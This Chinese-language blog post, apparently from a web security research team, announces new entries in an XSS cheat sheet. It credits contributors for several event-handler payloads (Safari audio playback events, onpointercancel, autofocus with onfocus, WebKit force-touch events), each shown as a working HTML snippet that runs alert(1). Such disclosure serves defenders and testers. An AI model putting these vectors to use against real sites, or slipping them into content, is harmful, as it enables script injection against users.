onwebkitplaybacktargetavailabilitychanged?! XSS攻击手册中的新异域事件

我们的XSS攻击手册的强大之处在于能够获得来自Web安全社区的精彩贡献，本次更新也不例外。我们获得了Mozilla的重要贡献，移除了在Firefox浏览器中不再适用于marquee标签的事件。

有一个非常隐蔽的Safari专属向量，使用了来自@amirmsafari的onwebkitplaybacktargetavailabilitychanged事件，该事件适用于audio和video标签：

1

<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>

我们收到了来自@Wcraft-log的提交，提供了需要大量用户交互的onpointercancel事件：

1

<xss onpointercancel=alert(1)>XSS</xss>

@Filipnyquist指出我们没有记录现在几乎所有元素都可以使用autofocus属性。这一发现最早由@RenwaX23和@lbherrera_提出：

1

<xss onfocus=alert(1) autofocus tabindex=1>

最后，我们收到了来自@zhenwarx的提交，显示我们遗漏了一系列需要用户与触控板交互的WebKit事件：

1
2
3
4
5

<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcewillbegin=alert(1)>XSS</xss>
<xss onwebkitmouseforceup=alert(1)>XSS</xss>
<xss onwebkitmouseforcedown=alert(1)>XSS</xss>
<xss onwebkitmouseforcechanged=alert(1)>XSS</xss>

注意：如果您想知道我们使用什么工具生成代码片段图像，我们使用的是优秀的在线工具Ray.so。

返回所有文章

本页面需要JavaScript以获得增强的用户体验。

相关研究

• 2025年8月6日 | Repeater Strike: 手动测试，放大效果
• 2025年7月15日 | Repeater Strike: 手动测试，放大效果
• 2025年4月30日 | 拖放攻击：利用ASCII字符利用VS Code
• 2025年4月23日 | 记录我的渗透测试：你黑客，AI来写报告！